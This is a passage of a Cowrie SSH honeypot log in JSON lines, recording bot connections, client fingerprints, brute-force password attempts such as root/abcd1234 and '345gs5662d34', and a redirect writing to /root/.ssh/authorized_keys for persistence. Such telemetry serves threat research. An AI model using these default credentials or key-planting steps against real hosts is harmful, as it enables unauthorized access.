-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.171621Z","src_ip":"212.227.125.160","session":"5f323eb98214"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.282578Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.283592Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56056,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebc7d3b2712b","protocol":"ssh","message":"New connection: 212.227.235.229:56056 (1.2.3.4:22) [session: ebc7d3b2712b]","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.523118Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.524155Z","src_ip":"212.227.235.229","session":"ebc7d3b2712b"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":35606,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc9bc83390bd","protocol":"ssh","message":"New connection: 139.19.117.131:35606 (1.2.3.4:22) [session: cc9bc83390bd]","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.527286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.528452Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.544921Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.579401Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.580017Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.597349Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"64:b5:22:6b:53:9a:fc:6d:1c:02:1a:45:4d:fb:17:69","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDYmuFzpuEpN/KHPbQkSUT1Xe/gVl3FpIe/GlhJEnW84rCMsYhRe2xxcPc1xfZd10JBhM1kEhs5aycIYiPvLYTRi7mA88hE15OVCkwgPT2HgaY8oetbiNiu18jBygbnku2/avpf/Xl2vkcNJRwHjkik3/Vid9fSleNWeAI+RGrMRRiP4hXVBQjHbuSFlw2VDg0uZINodP+n8oWBDHGnMGei9W6OXxQ3R5C+oKBw9NA3K/drsqvJh81jbEkDXyqCG0Nj0sAUk6o/aGIIQpwxI3ez2Vi/lqm5LYsRO6ICsHP6RXJT/08XkUVNMu7BLnje2RCG/kSKjVqW8QePyajHJ64kHwYf1yeyGfObZJWhUSP3yPK6UtGxBouyA/TPTqvba4vAmUy1Jl7hyWkoa4KUwgmsEizmT9n8GEg1USPXxRWNqv0VIi5160tcoujrB85HYwjwIhbphCqhTKyNwnnFJNratI1hGurgr8t0fflC/igLph8PapiayTwTLEbNwSUwVp8D3rvBkYB+XV2wO4+q24IoNZJO6ePXEA80jAVEa7eGhlnV5BUIIG+pYP/CkukcggyW+vGRTrl07KrvhAn9dLGDg1J8KZM2hMx5L/2ulgjKTjPZI566fL6Y0dDhPJZH8bxAq6i/ciXXZFeuaG4eCDkitPdSzhFtyuZQj712h6NLow==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.599031Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.765564Z","src_ip":"212.227.235.229","session":"ebc7d3b2712b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T14:12:21.771645Z","src_ip":"212.227.235.229","session":"ebc7d3b2712b"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:12:21.909094Z","src_ip":"212.227.125.160","session":"5f323eb98214"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:24.027633Z","src_ip":"212.227.235.229","session":"ebc7d3b2712b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54082,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f6dcef8b242","protocol":"ssh","message":"New connection: 212.227.235.229:54082 (1.2.3.4:22) [session: 7f6dcef8b242]","sensor":"my-vps","timestamp":"2025-08-26T14:12:24.255087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:12:24.256042Z","src_ip":"212.227.235.229","session":"7f6dcef8b242"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:12:24.486797Z","src_ip":"212.227.235.229","session":"7f6dcef8b242"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:12:25.447813Z","src_ip":"212.227.235.229","session":"7f6dcef8b242"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:26.507197Z","src_ip":"212.227.235.229","session":"7f6dcef8b242"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:26.508823Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:30.527500Z","src_ip":"139.19.117.131","session":"cc9bc83390bd"}
{"eventid":"cowrie.session.closed","duration":"72.0","message":"Connection lost after 72.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:35.393371Z","src_ip":"212.227.125.160","session":"5f323eb98214"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60023,"dst_ip":"1.2.3.4","dst_port":22,"session":"812d8219a4a0","protocol":"ssh","message":"New connection: 212.227.125.160:60023 (1.2.3.4:22) [session: 812d8219a4a0]","sensor":"my-vps","timestamp":"2025-08-26T14:12:36.427879Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:36.499276Z","src_ip":"212.227.125.160","session":"812d8219a4a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57968,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b416127900f","protocol":"ssh","message":"New connection: 212.227.125.160:57968 (1.2.3.4:22) [session: 4b416127900f]","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.114809Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.187415Z","src_ip":"212.227.125.160","session":"4b416127900f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57984,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b5f2082c553","protocol":"ssh","message":"New connection: 212.227.125.160:57984 (1.2.3.4:22) [session: 6b5f2082c553]","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.258260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.259005Z","src_ip":"212.227.125.160","session":"6b5f2082c553"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.330718Z","src_ip":"212.227.125.160","session":"6b5f2082c553"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:43.404311Z","src_ip":"212.227.125.160","session":"6b5f2082c553"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45900,"dst_ip":"1.2.3.4","dst_port":22,"session":"322772814a91","protocol":"ssh","message":"New connection: 212.227.125.160:45900 (1.2.3.4:22) [session: 322772814a91]","sensor":"my-vps","timestamp":"2025-08-26T14:13:03.128829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:13:03.130135Z","src_ip":"212.227.125.160","session":"322772814a91"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:13:04.039439Z","src_ip":"212.227.125.160","session":"322772814a91"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:13:06.160066Z","src_ip":"212.227.125.160","session":"322772814a91"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:13:07.397378Z","src_ip":"212.227.125.160","session":"322772814a91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34336,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b8648e6e2a","protocol":"ssh","message":"New connection: 212.227.125.160:34336 (1.2.3.4:22) [session: c6b8648e6e2a]","sensor":"my-vps","timestamp":"2025-08-26T14:13:40.169905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:13:40.229524Z","src_ip":"212.227.125.160","session":"c6b8648e6e2a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,